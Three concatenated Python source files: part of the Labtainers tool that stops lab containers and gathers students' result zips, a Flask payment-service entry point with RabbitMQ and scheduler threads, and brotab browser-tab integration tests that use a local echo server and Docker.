command = ['docker', 'cp', cont_source, tmp_dir]
# The zip filename created by Student.py has the format of e-mail.labname.zip
logger.debug("Command to execute is (%s)" % command)
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error_string = child.stderr.read().decode('utf-8').strip()
if len(error_string) > 0:
if ignore_stop_error:
logger.debug("Container %s fail on executing cp zip file: %s\n" % (container_name, error_string))
logger.debug("Command was (%s)" % command)
else:
logger.error("Container %s fail on executing cp zip file: %s\n" % (container_name, error_string))
logger.error("Command was (%s)" % command)
clone_names = GetContainerCloneNames(start_config.containers[name])
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
return None, None
local_tmp_zip = os.path.join(tmp_dir, 'zip')
try:
orig_zipfilenameext = os.listdir(local_tmp_zip)[0]
except:
if ignore_stop_error:
logger.debug('no files at %s\n' % local_tmp_zip)
else:
logger.error('no files at %s\n' % local_tmp_zip)
return None, None
orig_zipfilename, orig_zipext = os.path.splitext(orig_zipfilenameext)
baseZipFilename = os.path.basename(orig_zipfilename)
#NOTE: Use the '=' to separate e-mail+labname from the container_name
DestZipFilename = '%s=%s.zip' % (baseZipFilename, container_name)
DestZipPath = os.path.join('/home', username, host_home_xfer, DestZipFilename)
shutil.copyfile(os.path.join(local_tmp_zip, orig_zipfilenameext), DestZipPath)
currentContainerZipFilename = "/home/%s/%s/%s" % (username, host_home_xfer, DestZipFilename)
return baseZipFilename, currentContainerZipFilename
# Stop my_container_name container
def StopMyContainer(container_name, ignore_stop_error):
command = "docker stop -t 1 %s" % container_name
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
if ignore_stop_error:
logger.debug('Fail to stop container, error returned %s' % output[1].decode('utf-8'))
else:
logger.error('Fail to stop container, error returned %s' % output[1].decode('utf-8'))
#if len(output[0].strip()) > 0:
# logger.debug('StopMyContainer stdout %s' % output[0])
#result = subprocess.call(command, shell=True)
def GetContainerID(image):
command = "docker ps"
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
retval = None
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
elif len(output[0].decode('utf-8')) > 0:
docker_ps_output = output[0].decode('utf-8').split('\n')
for line in docker_ps_output:
line = line.strip()
if image in line:
parts = line.split()
retval = parts[0]
break
return retval
# Get a list of running lab names
def GetListRunningLabType():
lablist = []
is_gns3 = False
# Note: doing "docker ps" not "docker ps -a" to get just the running container
command = "docker ps"
logger.debug("GetListRunningLab Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0].decode('utf-8')) > 0:
docker_ps_output = output[0].decode('utf-8').split('\n')
for each_line in docker_ps_output:
# Skip empty line or the "CONTAINER ID" line - the header line returned by "docker ps"
current_line = each_line.strip()
if not current_line or len(current_line) == 0 or current_line.startswith("CONTAINER"):
continue
logger.debug(current_line)
# Assume the container name is the last token on the line
container_info = current_line.split()
container_name = container_info[-1]
# And the image is the 2nd token
image_name = container_info[1]
image_name = os.path.basename(image_name)
if image_name == 'labtainer.master.headless' or image_name == 'labtainer.headless.tester':
continue
if container_name.startswith(image_name):
''' std Labtainers image, get is labname '''
labname = container_name.split('.')[0]
elif 'labtainer' in image_name:
''' gns3 labtainer image '''
labname = image_name.split('_', 1)[0]
is_gns3 = True
else:
logger.debug('not a labtainer: %s' % image_name)
continue
if labname not in lablist:
logger.debug('appending %s' % labname)
lablist.append(labname)
return lablist, is_gns3
def GetListRunningLab():
lab_list, is_gns3 = GetListRunningLabType()
return lab_list
# Given a network name, if it is valid, get a list of labname for the container(s) that is(are)
# using that network. Note: the network name is passed in as an argument
def GetListLabContainerOnNetwork(network_name):
containerlabnamelist = []
command = "docker network inspect %s" % network_name
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
containers = result["Containers"]
for key in containers:
container_name = containers[key]["Name"]
# Assume the labname is the first token if split by '.'
labname = container_name.split('.')[0]
if labname not in containerlabnamelist:
containerlabnamelist.append(labname)
return containerlabnamelist
# Given an IP address (gateway IP address) - find a network name that has that IP address as its gateway
# Note: the IP address is passed in as an argument
def FindNetworkGivenGatewayIP(gateway_address):
found_match_network = False
found_match_network_name = ""
logger.debug("FindNetworkGivenGatewayIP %s" % gateway_address)
networklist = []
# First get a list of network name of driver=bridge
command = "docker network ls --filter driver=bridge"
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of network (driver=bridge), error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
network_list = output[0].decode('utf-8').split('\n')
for each_line in network_list:
# Skip empty line or the "NETWORK ID" line - the header line returned by "docker network"
current_line = each_line.strip()
if not current_line or current_line.startswith("NETWORK"):
continue
# Assume the network name is the second token on the line
container_info = current_line.split()
network_name = container_info[1]
# Do not need to check network name "bridge"
if network_name != "bridge" and network_name not in networklist:
networklist.append(network_name)
# Loop through each network (driver=bridge) to find if any uses IP address as gateway
for network_name in networklist:
command = "docker network inspect %s" % network_name
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
ipam_config = result["IPAM"]["Config"][0]
for key in ipam_config:
if key == "Gateway":
ipam_config_gateway_ip = ipam_config[key]
if gateway_address == ipam_config_gateway_ip:
found_match_network = True
found_match_network_name = network_name
break
return found_match_network, found_match_network_name
# Given a subnet (network subnet) - find a network name that has that same subnet
# Note: the subnet is passed in as an argument
def FindNetworkGivenSubnet(subnet):
found_match_network = False
found_match_network_name = ""
logger.debug("FindNetworkGivenSubnet %s" % subnet)
networklist = []
# First get a list of network name of driver=bridge
command = "docker network ls --filter driver=bridge"
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of network (driver=bridge), error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
network_list = output[0].decode('utf-8').split('\n')
for each_line in network_list:
# Skip empty line or the "NETWORK ID" line - the header line returned by "docker network"
current_line = each_line.strip()
if not current_line or current_line.startswith("NETWORK"):
continue
# Assume the network name is the second token on the line
container_info = current_line.split()
network_name = container_info[1]
# Do not need to check network name "bridge"
if network_name != "bridge" and network_name not in networklist:
networklist.append(network_name)
# Loop through each network (driver=bridge) to find if any that has the same subnet
for network_name in networklist:
command = "docker network inspect %s" % network_name
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8').strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
ipam_config = result["IPAM"]["Config"][0]
for key in ipam_config:
if key == "Subnet":
ipam_config_subnet = ipam_config[key]
if subnet == ipam_config_subnet:
found_match_network = True
found_match_network_name = network_name
break
return found_match_network, found_match_network_name
def AllContainersRunning(container):
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
if not IsContainerRunning(clone_full):
return False
return True
def IsContainerRunning(mycontainer_name):
cmd = 'docker ps -f id=%s' % mycontainer_name
try:
dumb = int(mycontainer_name, 16)
except:
cmd = 'docker ps -f name=%s' % mycontainer_name
try:
s = subprocess.check_output(shlex.split(cmd)).decode('utf-8')
except:
return False
if mycontainer_name in s:
return True
else:
return False
def ShouldBeRunning(start_config, container):
if start_config.multi_user is not None and start_config.multi_user != 'clones':
if start_config.multi_user == 'server' and container.client == 'yes':
return False
if start_config.multi_user == 'client' and container.client != 'yes':
return False
return True
def DoStopOne(start_config, labtainer_config, lab_path, name, container, zip_file_list, ignore_stop_error, results, keep_running):
labname = os.path.basename(lab_path)
#dumlog = os.path.join('/tmp', name+'.log')
#sys.stdout = open(dumlog, 'w')
#sys.stderr = sys.stdout
retval = True
mycontainer_name = container.full_name
container_user = container.user
container_password = container.password
mycontainer_image = container.image_name
haveContainer = AllContainersCreated(container)
logger.debug("AllContainersCreated for %s result (%s)" % (container.name, haveContainer))
# IsContainerCreated returned FAILURE if container does not exists
# error: can't stop non-existent container
if not haveContainer:
if ShouldBeRunning(start_config, container) and not ignore_stop_error:
logger.error("Container %s does not exist!\n" % mycontainer_name)
retval = False
elif container.tap == 'yes':
StopMyContainer(mycontainer_name, ignore_stop_error)
else:
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
if not IsContainerRunning(mycontainer_name):
if ShouldBeRunning(start_config, container):
if ignore_stop_error:
logger.debug("container %s not running\n" % (mycontainer_name))
else:
logger.error("container %s not running\n" % (mycontainer_name))
retval = False
continue
GatherOtherArtifacts(lab_path, name, mycontainer_name, container_user, container_password, ignore_stop_error)
# Before stopping a container, run 'Student.py'
# This will create zip file of the result
baseZipFilename, currentContainerZipFilename = CreateCopyChownZip(start_config, labtainer_config, name,
mycontainer_name, mycontainer_image, container_user, container_password, ignore_stop_error, keep_running)
if baseZipFilename is not None:
if currentContainerZipFilename is not None:
zip_file_list.append(currentContainerZipFilename)
else:
logger.debug('currentContainerZipFilename is None for container %s' % mycontainer_name)
logger.debug("baseZipFilename is (%s)" % baseZipFilename)
else:
logger.debug("baseZipFileName is None for container %s" % mycontainer_name)
#command = 'docker exec %s echo "%s\n" | sudo -S rmdir /tmp/.mylockdir 2>/dev/null' % (mycontainer_name, container_password)
command = 'docker exec %s sudo rmdir /tmp/.mylockdir 2>/dev/null' % (mycontainer_name)
os.system(command)
if not keep_running:
did_this = []
for mysubnet_name, mysubnet_ip in container.container_nets.items():
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
if subnet_name not in did_this:
disconnectNetworkResult = DisconnectNetworkFromContainer(mycontainer_name, subnet_name)
did_this.append(subnet_name)
# Stop the container
if not keep_running:
StopMyContainer(mycontainer_name, ignore_stop_error)
results.append(retval)
def SynchStop(start_config, run_container=None):
threads = []
now = datetime.datetime.now()
''' NOTE all prestop stdout will have same timestamp. '''
ts = now.strftime('%Y%m%d%H%M%S')
for name, container in start_config.containers.items():
if run_container is not None and container.full_name != run_container:
#print('not for me %s ' % run_container)
continue
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
t = threading.Thread(target=PreStop, args=[mycontainer_name, ts])
threads.append(t)
t.setName(name)
t.start()
logger.debug('prestop started on all')
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
def GatherZips(zip_file_list, labtainer_config, start_config, labname, lab_path):
mycwd = os.getcwd()
if len(zip_file_list) == 0:
logger.error('GatherZips called without any zips')
return
try:
base_filename = os.path.basename(zip_file_list[0])
except:
logger.error('No basefile found in %s' % zip_file_list[0])
return
baseZipFilename = base_filename.split('=')[0]
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
username = getpass.getuser()
xfer_dir = "/home/%s/%s" % (username, host_home_xfer)
try:
os.makedirs(xfer_dir)
except:
pass
# Create docs.zip in xfer_dir if COLLECT_DOCS is "yes"
if start_config.collect_docs.lower() == "yes":
docs_zip_file = "%s/docs.zip" % xfer_dir
logger.debug("Zipping docs directory to %s" % docs_zip_file)
docs_path = '%s/docs' % lab_path
if os.path.isdir(docs_path):
docs_zip_filelist = glob.glob('%s/*' % docs_path)
logger.debug(docs_zip_filelist)
# docs.zip file
docs_zipoutput = zipfile.ZipFile(docs_zip_file, "w")
# Go to the docs_path
os.chdir(docs_path)
for docs_fname in docs_zip_filelist:
docs_basefname = os.path.basename(docs_fname)
docs_zipoutput.write(docs_basefname, compress_type=zipfile.ZIP_DEFLATED)
# Note: DO NOT remove after the file is zipped
docs_zipoutput.close()
# Add docs.zip into the zip_file_list
zip_file_list.append(docs_zip_file)
else:
logger.debug('no docs at %s' % docs_path)
# Combine all the zip files
logger.debug("zip_file_list is ")
logger.debug(zip_file_list)
logger.debug("baseZipFilename is (%s)" % baseZipFilename)
combinedZipFilename = "%s/%s.zip" % (xfer_dir, baseZipFilename)
logger.debug("The combined zip filename is %s" % combinedZipFilename)
zipoutput = zipfile.ZipFile(combinedZipFilename, "w")
# Go to the xfer_dir
os.chdir(xfer_dir)
for fname in zip_file_list:
basefname = os.path.basename(fname)
zipoutput.write(basefname, compress_type=zipfile.ZIP_DEFLATED)
# Remove after the file is zipped
os.remove(basefname)
# Add count.json and labtainer.log (if they exist) to the zip file
count_path = LabCount.getPath('./', labname)
#print "count_path is %s" % count_path
if os.path.isfile(count_path):
parent = os.path.dirname(count_path)
os.chdir(mycwd)
os.chdir(parent)
fname = os.path.join('./', os.path.basename(count_path))
zipoutput.write(fname, compress_type=zipfile.ZIP_DEFLATED)
os.chdir(mycwd)
my_labtainer_log = os.path.join('./', 'labtainer.log')
if os.path.exists(my_labtainer_log):
zipoutput.write(my_labtainer_log, compress_type=zipfile.ZIP_DEFLATED)
zipoutput.close()
post_zip = os.path.join(lab_path, 'bin', 'postzip')
if os.path.isfile(post_zip):
cmd = "%s %s" % (post_zip, combinedZipFilename)
os.system(cmd)
os.chdir(mycwd)
def DoStop(start_config, labtainer_config, lab_path, ignore_stop_error, run_container=None, servers=None, clone_count=None, keep_running=False):
retval = True
labname = os.path.basename(lab_path)
logger.debug("DoStop Multiple Containers and/or multi-home networking, keep_running is %r" % keep_running)
SynchStop(start_config, run_container)
baseZipFilename = ""
zip_file_list = []
threads = []
results = []
for name, container in start_config.containers.items():
if run_container is not None and container.full_name != run_container:
#print('not for me %s ' % run_container)
continue
mycontainer_name = '%s.%s.student' % (labname, container.name)
t = threading.Thread(target=DoStopOne, args=(start_config, labtainer_config, lab_path,
name, container, zip_file_list, ignore_stop_error, results, keep_running))
threads.append(t)
t.setName(name)
t.start()
logger.debug('stopped all')
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
if not keep_running:
RemoveSubnets(start_config.subnets, ignore_stop_error)
if not ignore_stop_error:
if False in results:
logger.error('DoStopOne has at least one failure!')
sys.exit(1)
if len(zip_file_list) == 0:
if ignore_stop_error:
logger.debug('No zip files found')
else:
logger.error('No zip files found')
return None
''' Check for empty email identifier '''
if zip_file_list[0].startswith('.'):
lgr.error('Missing email for student, cannot gather artifacts')
return None
GatherZips(zip_file_list, labtainer_config, start_config, labname, lab_path)
return retval
# ignore_stop_error - set to 'False' : do not ignore error
# ignore_stop_error - set to 'True' : ignore certain error encountered since it might not even be an error
# such as error encountered when trying to stop non-existent container
def StopLab(lab_path, ignore_stop_error, run_container=None, servers=None, clone_count=None, keep_running=False):
labname = os.path.basename(lab_path)
if labname.endswith('labtainer.grader'):
return None
myhomedir = os.environ['HOME']
logger.debug("keep_running is %r" % keep_running)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger, servers, clone_count)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
CreateHostHomeXfer(host_xfer_dir)
if DoStop(start_config, labtainer_config, lab_path, ignore_stop_error, run_container=run_container,
servers=servers, clone_count=clone_count, keep_running=keep_running):
# Inform user where results are stored
print("Results stored in directory: %s" % host_xfer_dir)
syncdir = os.path.join(os.getenv('LABTAINER_DIR'), 'scripts','labtainer-student', '.tmp', labname, 'sync')
try:
os.rmdir(syncdir)
except:
pass
return host_xfer_dir
def DoMoreterm(lab_path, container_name, clone_num=None, alt_name=None):
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger)
if container_name not in start_config.containers:
logger.error("Container %s not found. Container must be one of the following:" % container_name)
for container_name in start_config.containers:
print('\t%s' % container_name)
print("Usage: moreterm.py <lab> <container>")
return False
logger.debug('num terms is %d' % start_config.containers[container_name].terminals)
if clone_num is None:
mycontainer_name = '%s.%s.student' % (labname, container_name)
else:
mycontainer_name = '%s.%s-%d.student' % (labname, container_name, clone_num)
if alt_name is not None:
mycontainer_name = alt_name
if not IsContainerCreated(mycontainer_name):
logger.error('DoMoreTerm container %s not found' % mycontainer_name)
sys.exit(1)
if not IsContainerRunning(mycontainer_name):
logger.error("Container %s is not running!\n" % (mycontainer_name))
sys.exit(1)
if start_config.containers[container_name].terminals == -1:
logger.debug("No terminals supported for %s" % container_name)
return False
else:
spawn_command = "gnome-terminal -- docker exec -it %s bash -l -c bash&" % mycontainer_name
logger.debug("spawn_command is (%s)" % spawn_command)
os.system(spawn_command)
return True
def DoTransfer(lab_path, container_name, filename, direction):
'''TBD this is not tested and likey broken'''
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
logger.debug("current working directory for %s" % mycwd)
logger.debug("current user's home directory for %s" % myhomedir)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
logger.debug('num terms is %d' % start_config.containers[container_name].terminals)
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
mycontainer_name = '%s.%s.student' % (labname, container_name)
if not IsContainerCreated(mycontainer_name):
logger.error('container %s not found' % mycontainer_name)
sys.exit(1)
if not IsContainerRunning(mycontainer_name):
logger.error("Container %s is not running!\n" % (mycontainer_name))
sys.exit(1)
container_user = ""
for name, container in start_config.containers.items():
if mycontainer_name == container.full_name:
container_user = container.user
if direction == "TOCONTAINER":
# Transfer from host to container
filename_path = '%s/%s' % (host_xfer_dir, filename)
logger.debug("File to transfer from host is (%s)" % filename_path)
if os.path.exists(filename_path) and os.path.isfile(filename_path):
# Copy file and chown it
command = 'docker cp %s %s:/home/%s/' % (filename_path, mycontainer_name, container_user)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOCONTAINER) file (%s) is %s" % (filename_path, result))
if result == FAILURE:
logger.error("Failed to copy file to container %s!\n" % mycontainer_name)
sys.exit(1)
command = 'docker exec %s sudo chown %s:%s /home/%s/%s' % (mycontainer_name, container_user, container_user, container_user, filename)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer chown file (%s) is %s" % (filename_path, result))
if result == FAILURE:
logger.error("Failed to set permission in container %s!\n" % mycontainer_name)
sys.exit(1)
else:
logger.error('Host does not have %s file' % filename_path)
sys.exit(1)
else:
# Transfer from container to host
command = 'docker cp %s:/home/%s/%s %s/' % (mycontainer_name, container_user, filename, host_xfer_dir)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOHOST) file (%s) is %s" % (filename, result))
if result == FAILURE:
logger.error("Failed to copy file from container %s!\n" % mycontainer_name)
sys.exit(1)
def CopyFilesToHost(lab_path, container_name, full_container_name, container_user):
labname = os.path.basename(lab_path)
isValidLab(lab_path)
config_path = os.path.join(lab_path,"config")
copy_path = os.path.join(config_path,"files_to_host.config")
logger.debug('CopyFilesToHost %s %s %s' % (labname, container_name, full_container_name))
logger.debug('CopyFilesToHost copypath %s' % copy_path)
if os.path.isfile(copy_path):
with open(copy_path) as fh:
for line in fh:
if not line.strip().startswith('#'):
try:
os.mkdir(os.path.join(os.getcwd(), labname))
except OSError as e:
#logger.error('could not mkdir %s in %s %s' % (labname, os.getcwd(),str(e)))
pass
container, file_name = line.split(':')
if container == container_name:
dest = os.path.join(os.getcwd(), labname, file_name)
command = 'docker cp %s:/home/%s/%s %s' % (full_container_name, container_user,
file_name.strip(), dest)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOHOST) file (%s) is %s" % (file_name,
result))
if result == FAILURE:
logger.error("Failed to copy file from container %s!\n" % full_container_name)
sys.exit(1)
def GetContainerId(image):
command = "docker ps"
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('GetContainerId, Failed to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
docker_ps_output = output[0].decode('utf-8').splitlines()
for each_line in docker_ps_output:
# Skip empty line or the "CONTAINER ID" line - the header line returned by "docker ps"
current_line = each_line.strip()
parts = current_line.split()
if parts[1].startswith(image):
return parts[0]
return None
|
app.py
|
import os
import sys
import logging
import pika
import threading
import schedule
import time
from flask import Flask, make_response, request, jsonify, g
from src.database.pg import connect_to_db as connect_to_db
from src.credit_card.controllers import credit_card as cc_controllers
from src.payment.controllers import payment as payment_controllers
from src.payment.controllers import retry_failed_payments
from src.rabbitmq import rmq
PORT = os.getenv('PORT', 3344)
app = Flask(__name__)
app.register_blueprint(cc_controllers, url_prefix='/api/v1/card')
app.register_blueprint(payment_controllers, url_prefix='/api/v1/payment')
# Loggers
gunicorn_logger = logging.getLogger('gunicorn.error')
app.logger.handlers = gunicorn_logger.handlers
app.logger.setLevel(gunicorn_logger.level)
def start_rabbitMQ_consumer():
print(' * Starting RabbitMQ')
channel = rmq.connect()
rmq.consume(channel)
def start_scheduler():
print(' * Scheduler up and running.')
while True:
schedule.run_pending()
time.sleep(1)
@app.before_request
def get_db():
app.logger.info('Opening connection...')
if 'db' not in g:
g.db = connect_to_db()
@app.teardown_appcontext
def teardown_db(exception):
db = g.pop('db', None)
if db is not None:
app.logger.info('Closing connection...')
db.close()
@app.errorhandler(404)
def not_found(e):
return make_response(jsonify({'status': 'ERROR', 'msg': 'URI nao encontrada.'}), 404)
@app.errorhandler(405)
def method_not_allowed(e):
return make_response(jsonify({'status': 'ERROR', 'msg': 'Metodo nao permitido.'}), 405)
@app.errorhandler(500)
def internal_error(e):
app.logger.critical(e)
return make_response(jsonify({'status': 'ERROR', 'msg': 'Ops... Algo interno aconteceu.'}), 500)
@app.route('/health')
def health():
cur = g.db.cursor()
cur.execute('SELECT 1+1 as sum', [])
if cur.fetchone()['sum'] == 2:
return make_response("Healthy :D\n", 200)
else:
return make_response("Not healthy :(\n", 500)
if __name__ == '__main__':
t1 = threading.Thread(target=start_rabbitMQ_consumer, args=[])
t1.start()
t2 = threading.Thread(target=start_scheduler, args=[])
t2.start()
schedule.every(120).seconds.do(retry_failed_payments)
# schedule.every(120).minutes.do(retry_failed_payments)
app.run(debug=False, use_reloader=False, port=PORT)
|
test_integration.py
|
import os
import signal
import threading
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
from subprocess import Popen
from subprocess import check_output
from unittest import TestCase
from urllib.parse import parse_qs
from urllib.parse import urlparse
import pytest
from brotab.api import api_must_ready
from brotab.inout import get_available_tcp_port
from brotab.inout import wait_net_service
from brotab.mediator.const import DEFAULT_MIN_HTTP_PORT
from brotab.tab import parse_tab_lines
def run(args):
return check_output(args, shell=True).decode('utf-8').strip().splitlines()
def git_root():
return run(['git rev-parse --show-toplevel'])[0]
def requires_integration_env():
value = os.environ.get('INTEGRATION_TEST')
return pytest.mark.skipif(
value is None,
reason=f"Skipped because INTEGRATION_TEST=1 is not set"
)
TIMEOUT = 60 # 15
ECHO_SERVER_PORT = 8087
class EchoRequestHandler(BaseHTTPRequestHandler):
"""
Sample URL:
localhost:9000?title=tab1&body=tab1
"""
def _get_str_arg(self, path, arg_name):
args = parse_qs(urlparse(path).query)
return ''.join(args.get(arg_name, ''))
def do_GET(self):
title = self._get_str_arg(self.path, 'title')
body = self._get_str_arg(self.path, 'body')
print('EchoServer received TITLE "%s" BODY "%s"' % (title, body))
self.send_response(200)
self.send_header("Content-Type", "text/html; charset=utf-8")
reply = ('<html><head><title>%s</title></head>'
'<body>%s</body></html>'
% (title, body)).encode('utf-8')
self.send_header("Content-Length", str(len(reply)))
self.end_headers()
self.wfile.write(reply)
# self.wfile.close()
ECHO_SERVER_HOST = 'localhost'
ECHO_SERVER_PORT = 9000
class EchoServer:
"""
This EchoServer is used to customize page title and content using URL
parameters.
"""
def __init__(self):
self._thread = None
self._server = None
def run(self, host=ECHO_SERVER_HOST, port=ECHO_SERVER_PORT):
self._server = HTTPServer((host, port), EchoRequestHandler)
self._thread = threading.Thread(
target=self._server.serve_forever, daemon=True)
self._thread.start()
def stop(self):
self._server.shutdown()
self._server.socket.close()
self._thread.join(TIMEOUT)
@staticmethod
def url(title='', body=''):
return 'http://%s:%s?title=%s&body=%s' % (
ECHO_SERVER_HOST, ECHO_SERVER_PORT, title, body)
class Brotab:
def __init__(self, target_hosts: str):
"""
target_hosts: e.g. 'localhost:4625,localhost:4626'
"""
self.targets = target_hosts
self.options = '--target %s' % self.targets if self.targets else ''
def list(self):
return run(f'bt {self.options} list')
def tabs(self):
return parse_tab_lines(self.list())
def open(self, window_id, url):
return run(f'echo "{url}" | bt {self.options} open {window_id}')
def active(self):
return run(f'bt {self.options} active')
def windows(self):
return run(f'bt {self.options} windows')
class Browser:
CMD = ''
CWD = ''
PROFILE = ''
def __init__(self):
print('CMD', self.CMD, 'CWD', self.CWD)
# Used a trick from here: https://stackoverflow.com/a/22582602/258421
os.makedirs('/dev/shm/%s' % self.PROFILE, exist_ok=True)
self._browser = Popen(self.CMD, shell=True,
cwd=self.CWD, preexec_fn=os.setsid)
print('PID', self._browser.pid)
wait_net_service('localhost', DEFAULT_MIN_HTTP_PORT, TIMEOUT)
print('init done PID', self._browser.pid)
def stop(self):
os.killpg(os.getpgid(self._browser.pid), signal.SIGTERM)
self._browser.wait(TIMEOUT)
@property
def pid(self):
return self._browser.pid
class Container:
NAME = 'chrome/chromium'
def __init__(self):
root = git_root()
self.guest_port = 4625
self.host_port = get_available_tcp_port()
display = os.environ.get('DISPLAY', ':0')
args = ['docker', 'run', '-v',
f'"{root}:/brotab"',
# '-p', '19222:9222',
'-p', f'{self.host_port}:{self.guest_port}',
'--detach --rm --cpuset-cpus 0',
'--memory 512mb -v /tmp/.X11-unix:/tmp/.X11-unix',
f'-e DISPLAY=unix{display}',
'-v /dev/shm:/dev/shm',
'brotab-integration']
cmd = ' '.join(args)
self.container_id = run(cmd)[0]
api_must_ready(self.host_port, self.NAME, 'a', client_timeout=3.0, startup_timeout=10.0)
def stop(self):
run(f'docker kill {self.container_id}')
def __enter__(self):
return self
def __exit__(self, type_, value, tb):
self.stop()
@property
def guest_addr(self):
return f'localhost:{self.guest_port}'
@property
def host_addr(self):
return f'localhost:{self.host_port}'
def echo_url(self, title=None, body=None):
url = f'http://{self.guest_addr}/echo?'
url += 'title=' + title if title else ''
url += '&body=' + body if body else ''
return url
def targets(containers: [Container]) -> str:
return ','.join([c.host_addr for c in containers])
@requires_integration_env()
class TestIntegration(TestCase):
def test_open_single(self):
with Container() as c:
bt = Brotab(targets([c]))
tabs = bt.list()
assert 'tab1' not in ''.join(tabs)
tab_ids = bt.open('a.1', c.echo_url('tab1'))
assert len(tab_ids) == 1
tabs = bt.list()
assert 'tab1' in ''.join(tabs)
assert tab_ids[0] in ''.join(tabs)
def test_active_tabs(self):
with Container() as c:
bt = Brotab(targets([c]))
bt.open('a.1', c.echo_url('tab1'))
bt.open('a.1', c.echo_url('tab2'))
bt.open('a.1', c.echo_url('tab3'))
assert len(bt.tabs()) == 4
active_id = bt.active()[0].split('\t')[0]
assert active_id == bt.tabs()[-1].id
@pytest.mark.skip
class TestChromium(TestCase):
def setUp(self):
self._echo_server = EchoServer()
self._echo_server.run()
self.addCleanup(self._echo_server.stop)
self._browser = Chromium()
# self._browser = Firefox()
# self.addCleanup(self._browser.stop)
print('SETUP DONE:', self._browser.pid)
def tearDown(self):
print('CHROME', self._browser)
print('BLOCK DONE')
def test_open_single(self):
print('SINGLE START')
tabs = Brotab.list()
assert 'tab1' not in ''.join(tabs)
Brotab.open('a.1', EchoServer.url('tab1'))
tabs = Brotab.list()
assert 'tab1' in ''.join(tabs)
print('SINGLE END')
def test_active_tabs(self):
Brotab.open('a.1', EchoServer.url('tab1'))
Brotab.open('a.2', EchoServer.url('tab2'))
Brotab.open('a.3', EchoServer.url('tab3'))
assert len(Brotab.tabs()) == 4
assert Brotab.active()[0] == Brotab.tabs()[-1].id
if __name__ == '__main__':
server = EchoServer()
server.run(ECHO_SERVER_HOST, ECHO_SERVER_PORT)
print('Running EchoServer at %s:%s. Press Enter to terminate' % (
